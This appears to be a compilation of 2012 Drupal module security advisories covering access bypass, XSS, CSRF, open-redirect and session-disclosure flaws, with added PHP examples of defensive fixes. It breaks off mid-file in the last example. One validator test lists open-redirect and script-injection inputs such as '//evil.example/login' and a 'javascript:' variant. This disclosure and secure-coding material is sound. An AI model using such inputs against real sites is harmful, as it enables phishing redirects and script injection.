SOLUTION
--------
Install the latest version:

* If you use the Secure Login module for Drupal 7.x, upgrade to Secure Login 7.x-1.3 [4].

Also see the Secure Login [5] project page.

REPORTED BY
-----------
* Albert Martin [6]

FIXED BY
--------
* Mark Burdett [7], the module maintainer

COORDINATED BY
--------------
* Heine Deelstra [8] of the Drupal Security Team
* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/securelogin
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/securelogin
[4] https://drupal.org/node/1698988
[5] http://drupal.org/project/securelogin
[6] https://drupal.org/user/1888132
[7] https://drupal.org/user/12302
[8] http://drupal.org/user/17943
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
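The open-redirect class described in the advisory above, as an added example that is not the Secure Login module's own code: an HTTP-to-HTTPS redirect only carries the requested path over when that path is confirmed to be site-internal, and otherwise falls back to the HTTPS front page. The inline check has the same purpose as Drupal 7's url_is_external() but is written out so the script runs on plain PHP without a Drupal bootstrap; the host name, the function names and the sample destinations are all constructed for the example.

```php
<?php
// Added example, not the Secure Login module's code. A plain-HTTP request for
// a page carrying a secured form is redirected to HTTPS; the path taken from
// a "destination"-style query parameter (PHP has already URL-decoded it by the
// time it sits in $_GET) must be confirmed to be site-internal before it is
// used as the redirect target. The check below stands in for Drupal 7's
// url_is_external(); everything here is constructed for the example.

/**
 * TRUE when $path would take the browser off-site if used as a redirect.
 */
function example_path_is_external($path) {
  // Browsers drop ASCII control characters while parsing a URL, so strip them
  // first; otherwise "ht<TAB>tp://host" would slip past the scheme test.
  $path = preg_replace('/[\x00-\x1F\x7F]/', '', $path);
  // Browsers accept "\" in place of "/" in the authority part, so
  // "/\evil.example" and "\\evil.example" both mean "//evil.example".
  $path = str_replace('\\', '/', $path);
  // A scheme prefix ("http:", "javascript:", "data:") or a scheme-relative
  // "//host" prefix both leave the site.
  return (bool) preg_match('#^(?:[a-z][a-z0-9+.-]*:|//)#i', $path);
}

/**
 * Builds the HTTPS URL a plain-HTTP request should be redirected to.
 * An external-looking $destination is discarded and the user lands on the
 * HTTPS front page instead of wherever the parameter pointed.
 */
function example_https_redirect_target($destination, $host) {
  if (!is_string($destination) || example_path_is_external($destination)) {
    $destination = '';
  }
  return 'https://' . $host . '/' . ltrim($destination, '/');
}

// Constructed sample inputs: values a request might carry in its query string.
$host = 'www.example.com';
$samples = array(
  'user/login',
  '/node/1?page=2',
  '//evil.example/login',
  '/\\evil.example/login',
  'http://evil.example/login',
  "java\tscript:alert(1)",
);
foreach ($samples as $destination) {
  printf("%-28s -> %s\n", $destination, example_https_redirect_target($destination, $host));
}
```

Run it with `php example.php`; the first two samples stay on the configured host and the remaining four are replaced by the front page. The normalisation steps matter more than the regex: without stripping control characters and folding backslashes, the scheme test alone passes strings that every mainstream browser still treats as an off-site navigation.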
[Full-disclosure] [Security-news] SA-CONTRIB-2012-117 - Location - Access Bypass

View online: http://drupal.org/node/1700588

* Advisory ID: DRUPAL-SA-CONTRIB-2012-117
* Project: Location [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-July-25
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION
-----------
The Location module allows real-world geographic locations to be associated with Drupal nodes, including people, places, and other content. The Location Search sub-module adds a search page for searching for locations.

The Location Search module fails to enforce content and user access permissions and node access restrictions, meaning any user can see any node or user results on the location search page. From now on users must have the "access content" permission and any relevant node access rights to see node based location results and the "view user profiles" and "view all user locations" permissions to see user based location results.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Location Search (Location sub-module) 6.x versions prior to 6.x-3.2.
* Location Search (Location sub-module) 7.x versions prior to 7.x-3.0-alpha1.

Drupal core is not affected. If you do not use the contributed Location [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Location Search (Location sub-module) module for Drupal 6.x, upgrade to Location 6.x-3.2 [4]
* If you use the Location Search (Location sub-module) module for Drupal 7.x, upgrade to Location 7.x-3.0-alpha1 [5]

Also see the Location [6] project page.

REPORTED BY
-----------
* Jon Daley [7]

FIXED BY
--------
* Reuben Turk [8] the module maintainer
* Ankur Rishi [9] the module maintainer

COORDINATED BY
--------------
* Greg Knaddison [10] of the Drupal Security Team
* Ben Jeavons [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/location
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/location
[4] http://drupal.org/node/1699962
[5] http://drupal.org/node/1699984
[6] http://drupal.org/project/location
[7] http://drupal.org/user/586142
[8] http://drupal.org/user/350381
[9] http://drupal.org/user/11703
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/91990
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
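The access checks the advisory above lists for a location search page, as an added Drupal 7 example that is not the Location module's own code: the page requires "access content", node results carry the node_access query tag so a node-access module's grants are applied inside the query, and user results additionally require the "view user profiles" and "view all user locations" permissions (permission strings taken from the advisory text). The table {example_location_index} and its columns nid, uid and city are placeholders standing in for the module's real schema; hook_menu(), user_access(), db_select(), db_like(), addTag(), l() and t() are standard Drupal 7 API functions.

```php
<?php
// Added example, not the Location module's code. Drupal 7 API; assumes a
// placeholder table {example_location_index} (columns nid, uid, city) that
// maps a stored location to a node or to a user. Real table names differ.

/**
 * Implements hook_menu().
 */
function example_locsearch_menu() {
  $items['example/location-search'] = array(
    'title' => 'Location search',
    'page callback' => 'example_locsearch_page',
    // Nobody reaches the page at all without the base content permission.
    'access arguments' => array('access content'),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

/**
 * Node-based results: published nodes only, filtered by node access grants.
 */
function example_locsearch_nodes($keyword) {
  $query = db_select('node', 'n');
  $query->join('example_location_index', 'li', 'li.nid = n.nid');
  $query->fields('n', array('nid', 'title'))
    ->condition('n.status', NODE_PUBLISHED)
    ->condition('li.city', '%' . db_like($keyword) . '%', 'LIKE');
  // The node_access tag is what makes node access modules' grants apply:
  // rows the current user may not view are removed inside the query itself,
  // so a listing cannot leak titles of restricted nodes.
  $query->addTag('node_access');
  return $query->execute()->fetchAllKeyed();
}

/**
 * User-based results: only for users allowed to see profiles and all locations.
 */
function example_locsearch_users($keyword) {
  if (!user_access('view user profiles') || !user_access('view all user locations')) {
    return array();
  }
  $query = db_select('users', 'u');
  $query->join('example_location_index', 'li', 'li.uid = u.uid');
  $query->fields('u', array('uid', 'name'))
    ->condition('u.status', 1)
    ->condition('li.city', '%' . db_like($keyword) . '%', 'LIKE');
  return $query->execute()->fetchAllKeyed();
}

/**
 * Page callback: merges both result sets into a render array. l() and the
 * %city placeholder of t() escape the user-supplied strings on output.
 */
function example_locsearch_page() {
  $keyword = isset($_GET['city']) ? $_GET['city'] : '';
  $items = array();
  foreach (example_locsearch_nodes($keyword) as $nid => $title) {
    $items[] = l($title, 'node/' . $nid);
  }
  foreach (example_locsearch_users($keyword) as $uid => $name) {
    $items[] = l($name, 'user/' . $uid);
  }
  return array(
    '#theme' => 'item_list',
    '#items' => $items,
    '#title' => t('Locations matching %city', array('%city' => $keyword)),
  );
}
```

The point of the node branch is that a per-row node_access() call after the query would fix the leak but not the paging and counts; the query tag lets the node access system rewrite the SQL so the restricted rows never come back from the database.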
[Full-disclosure] [Security-news] SA-CONTRIB-2012-116 - Subuser Cross Site Request Forgery (CSRF) and Access Bypass

View online: http://drupal.org/node/1700584

* Advisory ID: DRUPAL-SA-CONTRIB-2012-116
* Project: Subuser [1] (third-party module)
* Version: 6.x
* Date: 2012-July-25
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass, Cross Site Request Forgery

DESCRIPTION
-----------
The Subuser module allows users to be given the permission to create subusers. The subusers may then be automatically assigned a role or roles. The parent user then has the ability to manage the subusers they have created.

A parent user is allowed to assume the role of a subuser they created (switch users) without having the "switch subuser" permission. However, users are prevented from switching to subusers that were not created by them.

Additionally users can be switched to a subuser without intending to do so via a Cross Site Request Forgery attack (CSRF).

CVE: Requested

VERSIONS AFFECTED
-----------------
* subuser 6.x-1.x versions prior to 6.x-1.8.

Drupal core is not affected. If you do not use the contributed Subuser [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Subuser module for Drupal 6.x, upgrade to Subuser 6.x-1.8 [4]

Also see the Subuser [5] project page.

REPORTED BY
-----------
* Stella Power [6] of the Drupal Security Team

FIXED BY
--------
* Jimmy Berry [7] the module maintainer
* Lee Rowlands [8]

COORDINATED BY
--------------
* Stella Power [9] of the Drupal Security Team
* Greg Knaddison [10] of the Drupal Security Team
* Michael Hess [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/subuser
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/subuser
[4] http://drupal.org/node/1700550
[5] http://drupal.org/project/subuser
[6] http://drupal.org/user/66894
[7] http://drupal.org/user/214218
[8] http://drupal.org/user/395439
[9] http://drupal.org/user/66894
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/102818
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
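The two defects the advisory above describes, as an added example that is not the Subuser module's own code: a "switch to subuser" action that (a) requires the "switch subuser" permission and confirms the target was created by the caller, closing the access bypass, and (b) requires a per-session, per-target token on the request so a forged cross-site request cannot trigger the switch. In a real Drupal module drupal_get_token() and drupal_valid_token() supply that token; here an HMAC over a constructed session secret stands in for them so the file runs on plain PHP. The accounts, uids, permission lists and the parent map are all constructed sample data.

```php
<?php
// Added example, not the Subuser module's code. Shows the checks a
// switch-to-subuser handler needs: permission, ownership of the target, and
// a request token bound to the session and the target so a cross-site
// request cannot trigger the switch. Drupal's drupal_get_token() /
// drupal_valid_token() play the token role in a real module; the HMAC below
// stands in for them. All data here is constructed for the example.

// Constructed per-session secret (Drupal derives its tokens from the session
// id and the site's private key).
const EXAMPLE_SESSION_SECRET = 'constructed-per-session-secret';

/**
 * Ownership map: subuser uid => uid of the parent who created it (constructed).
 */
function example_subuser_parents() {
  return array(11 => 5, 12 => 5, 13 => 7);
}

/**
 * Token minted into the switch link for one target; unguessable without the
 * session secret, and tied to the target so it cannot be replayed elsewhere.
 */
function example_switch_token($session_secret, $target_uid) {
  return hash_hmac('sha256', 'switch-subuser:' . (int) $target_uid, $session_secret);
}

/**
 * Decides whether $actor may switch to $target_uid.
 *
 * @param array $actor  array('uid' => int, 'permissions' => string[])
 * @return string  'ok', or the reason the request was refused.
 */
function example_switch_subuser(array $actor, $target_uid, $token, $session_secret) {
  // 1. Permission: the role must actually grant the action.
  if (!in_array('switch subuser', $actor['permissions'], TRUE)) {
    return 'denied: missing "switch subuser" permission';
  }
  // 2. Ownership: only subusers this parent created.
  $parents = example_subuser_parents();
  if (!isset($parents[$target_uid]) || $parents[$target_uid] !== $actor['uid']) {
    return 'denied: not a subuser of this account';
  }
  // 3. CSRF: the request must carry the token minted for this session+target.
  //    A link on a third-party page cannot know it, so a forged request fails
  //    here even though the victim's session cookie was sent along.
  $expected = example_switch_token($session_secret, $target_uid);
  if (!is_string($token) || !hash_equals($expected, $token)) {
    return 'denied: invalid or missing token';
  }
  return 'ok';
}

// Constructed scenarios.
$parent = array('uid' => 5, 'permissions' => array('switch subuser'));
$no_perm = array('uid' => 5, 'permissions' => array());
$good = example_switch_token(EXAMPLE_SESSION_SECRET, 11);
$cases = array(
  'own subuser, valid token'      => example_switch_subuser($parent, 11, $good, EXAMPLE_SESSION_SECRET),
  'other parent\'s subuser'       => example_switch_subuser($parent, 13, example_switch_token(EXAMPLE_SESSION_SECRET, 13), EXAMPLE_SESSION_SECRET),
  'own subuser, token for uid 12' => example_switch_subuser($parent, 11, example_switch_token(EXAMPLE_SESSION_SECRET, 12), EXAMPLE_SESSION_SECRET),
  'own subuser, no token'         => example_switch_subuser($parent, 11, NULL, EXAMPLE_SESSION_SECRET),
  'no permission, valid token'    => example_switch_subuser($no_perm, 11, $good, EXAMPLE_SESSION_SECRET),
);
foreach ($cases as $label => $result) {
  printf("%-32s %s\n", $label, $result);
}
```

Only the first scenario succeeds. The ordering is deliberate: the cheap permission and ownership checks run before the token comparison, and hash_equals() keeps the comparison constant-time. In Drupal the same structure fits an access callback in hook_menu(), with drupal_valid_token($token, 'switch-subuser:' . $uid) replacing the HMAC.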
[Full-disclosure] [Security-news] SA-CONTRIB-2012-115 - Gallery formatter - Cross Site Scripting (XSS)

View online: http://drupal.org/node/1700578

* Advisory ID: DRUPAL-SA-CONTRIB-2012-115
* Project: Gallery formatter [1] (third-party module)
* Version: 7.x
* Date: 2012-July-25
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
Gallery formatter provides a field formatter for images that turns the fields into jQuery galleries.

The module did not properly escape input from the user before printing it to the browser, allowing malicious users to inject script code into the page.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create the nodes / entities and the fields that use the formatter.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Gallery formatter 7.x-1.x versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Gallery formatter [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Gallery formatter module for Drupal 7.x, upgrade to Gallery formatter 7.x-1.2 [4]

Also see the Gallery formatter [5] project page.

REPORTED BY
-----------
* Sudipta Bandyopadhyay [6]

FIXED BY
--------
* Manuel Garcia [7] the module maintainer

COORDINATED BY
--------------
* Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/galleryformatter
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/galleryformatter
[4] http://drupal.org/node/1699744
[5] http://drupal.org/project/galleryformatter
[6] http://drupal.org/user/140596
[7] http://drupal.org/user/213194
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-114 - Campaign Monitor - Cross Site Scripting (XSS)

View online: http://drupal.org/node/1691446

* Advisory ID: SA-CONTRIB-2012-114
* Project: Campaign Monitor [1] (third-party module)
* Version: 6.x
* Date: 2012-July-18
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
This module enables you to integrate Campaign Monitor into Drupal so you can give users the ability to subscribe and unsubscribe for your Campaign Monitor lists.

The module doesn't sufficiently validate strings entered in the administration interface.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer campaignmonitor".

CVE: Requested

VERSIONS AFFECTED
-----------------
* Campaign Monitor 6.x-2.x versions prior to 6.x-2.5

Drupal core is not affected. If you do not use the contributed Campaign Monitor [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Campaign Monitor module for Drupal 6.x, upgrade to Campaign Monitor 6.x-2.5 [4]

Also see the Campaign Monitor [5] project page.

REPORTED BY
-----------
* Andrey Tretyakov [6]

FIXED BY
--------
* Jesper Kristensen [7] the module maintainer

COORDINATED BY
--------------
* Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/campaignmonitor
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/campaignmonitor
[4] http://drupal.org/node/1689790
[5] http://drupal.org/project/campaignmonitor
[6] http://drupal.org/user/169459
[7] http://drupal.org/user/697210
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-104 - Privatemsg - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1649346

* Advisory ID: DRUPAL-SA-CONTRIB-2012-104
* Project: Privatemsg [1] (third-party module)
* Version: 7.x
* Date: 2012-June-20
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

The Privatemsg module allows users to send private messages to each other.

The module doesn't sufficiently sanitize user names when creating messages.

This vulnerability is mitigated by the fact that it is not possible to create insecure user names through the default user interface. The exploit is only possible in combination with another module that allows this, such as Realname [3], which allows site builders to choose fields to display as an alternative username.

CVE: Requested

VERSIONS AFFECTED

* Privatemsg 7.x-1.x versions prior to 7.x-1.3

Drupal core is not affected. If you do not use the contributed Privatemsg [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Privatemsg module for Drupal 7, upgrade to Privatemsg 7.x-1.3 [5]

Also see the Privatemsg [6] project page.

REPORTED BY

* Dave Reid [7] of the Drupal Security Team

FIXED BY

* Sascha Grossenbacher [8] the module maintainer

COORDINATED BY

* Dave Reid [9] of the Drupal Security Team
* Greg Knaddison [10] of the Drupal Security Team
* Michael Hess [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/privatemsg
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/realname
[4] http://drupal.org/project/privatemsg
[5] http://drupal.org/node/1649338
[6] http://drupal.org/project/privatemsg
[7] http://drupal.org/user/53892
[8] http://drupal.org/user/214652
[9] http://drupal.org/user/53892
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/102818
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-103 - Global Redirect - Open Redirect
View online: http://drupal.org/node/1633054

* Advisory ID: DRUPAL-SA-CONTRIB-2012-103
* Project: Global Redirect [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-June-13
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Open Redirect

DESCRIPTION

This module improves SEO and usability of a site by redirecting visitors to user-friendly and search-engine-friendly URLs.

The module does not sufficiently validate that a destination URL is internal to the site, allowing an attacker to disguise a malicious destination address as a query parameter passed to a legitimate site URL.

This vulnerability is mitigated by the fact that a site must have the "non-clean to clean" redirect enabled; however, this is the default configuration.

CVE: Requested

VERSIONS AFFECTED

* Global Redirect 6.x-1.x versions prior to 6.x-1.4.
* Global Redirect 7.x-1.x versions prior to 7.x-1.4.

Drupal core is not affected. If you do not use the contributed Global Redirect [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Global Redirect module for Drupal 6.x, upgrade to Global Redirect 6.x-1.4 [4]
* If you use the Global Redirect module for Drupal 7.x, upgrade to Global Redirect 7.x-1.4 [5]

Also see the Global Redirect [6] project page.

REPORTED BY

* Ben Johnson [7] (benpjohnson)
* Justin Klein-Keane [8] (Justin_KleinKeane)
* Joe Chambers [9] (myrapunzeled)

FIXED BY

* Nicholas Thompson [10] the module maintainer
* Dave Reid [11] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [12] of the Drupal Security Team
* Dave Reid [13] of the Drupal Security Team
* Michael Hess [14] of the Drupal Security Team
* Dylan Tack [15] of the Drupal Security Team
* David Rothstein [16] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [17].

Learn more about the Drupal Security team and their policies [18], writing secure code for Drupal [19], and securing your site [20].

[1] http://drupal.org/project/globalredirect
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/globalredirect
[4] https://drupal.org/node/1378116
[5] https://drupal.org/node/1378118
[6] http://drupal.org/project/globalredirect
[7] http://drupal.org/user/268889
[8] http://drupal.org/user/302225
[9] http://drupal.org/user/1228542
[10] http://drupal.org/user/59351
[11] http://drupal.org/user/53892
[12] http://drupal.org/user/36762
[13] http://drupal.org/user/53892
[14] http://drupal.org/user/102818
[15] http://drupal.org/user/96647
[16] http://drupal.org/user/124982
[17] http://drupal.org/contact
[18] http://drupal.org/security-team
[19] http://drupal.org/writing-secure-code
[20] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-102 - Ubercart AJAX Cart - Potential Disclosure of user Session ID
View online: http://drupal.org/node/1633048

* Advisory ID: DRUPAL-SA-CONTRIB-2012-102
* Project: Ubercart AJAX Cart [1] (third-party module)
* Version: 6.x
* Date: 2012-June-13
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Information Disclosure

DESCRIPTION

This module enables you to replace the default Ubercart shopping cart block with an AJAX-enabled one.

The module includes the user's current session ID in one of its JavaScript settings keys on every page load, which could be intercepted if the user's connection is not over SSL.

This vulnerability is mitigated by the fact that an attacker must gain read access to the HTML output of a page with the uc_ajax_cart block enabled in order to potentially hijack the user's session. The issue is only known to affect sites that use some additional form of caching for authenticated users that shares JavaScript settings values, which is not a common case.

CVE: Requested

VERSIONS AFFECTED

* uc_ajax_cart 6.x-2.x versions prior to 6.x-2.1.

Drupal core is not affected. If you do not use the contributed Ubercart AJAX Cart [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the uc_ajax_cart module for Drupal 6.x, upgrade to uc_ajax_cart 6.x-2.1 [4]

Also see the Ubercart AJAX Cart [5] project page.

REPORTED BY

* Neil Bertram [6]

FIXED BY

* Stewart Adam [7], the module maintainer
* Gerhard Killesreiter [8] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/uc_ajax_cart
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/uc_ajax_cart
[4] http://drupal.org/node/1619586
[5] http://drupal.org/project/uc_ajax_cart
[6] http://drupal.org/user/154713
[7] http://drupal.org/user/586244
[8] http://drupal.org/user/83
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-101 - Protected Node - Access Bypass
View online: http://drupal.org/node/1632918

* Advisory ID: DRUPAL-SA-CONTRIB-2012-101
* Project: Protected node [1] (third-party module)
* Version: 6.x
* Date: 2012-June-13
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

The Protected Node module enables users to use a password to restrict access to an individual node or all nodes of a node type.

The module doesn't sufficiently protect node access when nodes are accessed outside of the standard node view (i.e. node/1 is protected but other lists are not).

CVE: Requested

VERSIONS AFFECTED

* Protected node 6.x-1.x versions prior to 6.x-1.6.

Drupal core is not affected. If you do not use the contributed Protected node [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Protected node module for Drupal 6.x, upgrade to Protected node 6.x-1.6 [4]

Also see the Protected node [5] project page.

REPORTED BY

* Martin Barbella [6]

FIXED BY

* Alexis Wilke [7] the module maintainer

COORDINATED BY

* Greg Knaddison [8] of the Drupal Security Team
* Michael Hess [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/protected_node
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/protected_node
[4] http://drupal.org/node/1258034
[5] http://drupal.org/project/protected_node
[6] http://drupal.org/user/633600
[7] http://drupal.org/user/356197
[8] http://drupal.org/user/36762
[9] http://drupal.org/user/102818
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-100 - SimpleMeta - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1632908

* Advisory ID: DRUPAL-SA-CONTRIB-2012-100
* Project: SimpleMeta [1] (third-party module)
* Version: 6.x
* Date: 2012-June-13
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

The Simple Meta module provides a method to set meta tags, such as page title, description and keywords, for nodes, views and other pages.

The module doesn't sufficiently confirm user intent when adding and deleting meta tag entries, allowing a malicious user to trick a site admin into deleting entries or adding inappropriate entries.

CVE: Requested

VERSIONS AFFECTED

* Simple meta 6.x-1.x all versions prior to 6.x-2.0.

Drupal core is not affected. If you do not use the contributed SimpleMeta [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Simple meta module for Drupal 6.x, upgrade to Simple meta 6.x-2.0 [4]

The 6.x-1.x branch is no longer supported and all users of that branch should upgrade to the 6.x-2.x code.

Also see the SimpleMeta [5] project page.

REPORTED BY

* Nicholas Thompson [6]

FIXED BY

* Alexander [7] the module maintainer

COORDINATED BY

* Greg Knaddison [8] of the Drupal Security Team
* Michael Hess [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/simplemeta
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/simplemeta
[4] http://drupal.org/node/1534874
[5] http://drupal.org/project/simplemeta
[6] http://drupal.org/user/59351
[7] http://drupal.org/user/366450
[8] http://drupal.org/user/36762
[9] http://drupal.org/user/102818
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-099 - Node Hierarchy - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1632900

* Advisory ID: DRUPAL-SA-CONTRIB-2012-099
* Project: Node Hierarchy [1] (third-party module)
* Version: 6.x
* Date: 2012-June-13
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

The Node Hierarchy module allows for the creation of parent-child relationships among nodes that can create a tree-like hierarchy of content.

The module doesn't sufficiently confirm user intent when reordering child nodes, allowing a malicious user to trick a site admin into changing the desired hierarchy.

CVE: Requested

VERSIONS AFFECTED

* Node Hierarchy 6.x-1.x versions prior to 6.x-1.5.

Drupal core is not affected. If you do not use the contributed Node Hierarchy [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Node Hierarchy module for Drupal 6.x, upgrade to Node Hierarchy 6.x-1.5 [4]

Also see the Node Hierarchy [5] project page.

REPORTED BY

* Dylan Tack [6] of the Drupal Security Team

FIXED BY

* Ronan Dowling [7] the module maintainer

COORDINATED BY

* Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/nodehierarchy
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/nodehierarchy
[4] http://drupal.org/node/1632432
[5] http://drupal.org/project/nodehierarchy
[6] http://drupal.org/user/96647
[7] http://drupal.org/user/72815
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
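The SimpleMeta and Node Hierarchy advisories above share one root cause: a request that changes state (delete a meta tag entry, reorder child nodes) is honoured without any proof that the logged-in administrator meant to send it, so a page the admin merely visits can issue it on their behalf. The block below is an added example, not code from either module or from Drupal core. It shows the standard remedy in standalone PHP: every state-changing link carries a token that is an HMAC over the user's session and the exact action, keyed with a site secret, and the handler refuses the request before touching anything if the token does not verify. Drupal core packages the same idea as drupal_get_token()/drupal_valid_token() for links and confirm_form() for destructive forms; the names SITE_SECRET, $sessionId and the path /admin/simplemeta/delete/42 here are constructed placeholders, not the modules' real values.

```php
<?php
// Added example: not code from SimpleMeta, Node Hierarchy or Drupal core.
// A state-changing request must carry a token a third-party page cannot
// forge: an HMAC over the user's session id and the exact action, keyed with
// a site secret. Drupal core offers the same idea as drupal_get_token() /
// drupal_valid_token(); this is a standalone re-implementation for reading.

// Constructed placeholders; a real site derives these from its private key
// and the active session.
const SITE_SECRET = 'constructed-example-site-secret';
$sessionId = 'constructed-session-id-1234';

/** Token bound to one session and one action (verb plus object id). */
function action_token(string $sessionId, string $action, string $secret): string
{
    return hash_hmac('sha256', $sessionId . '|' . $action, $secret);
}

/** Constant-time comparison so a guessed token leaks nothing via timing. */
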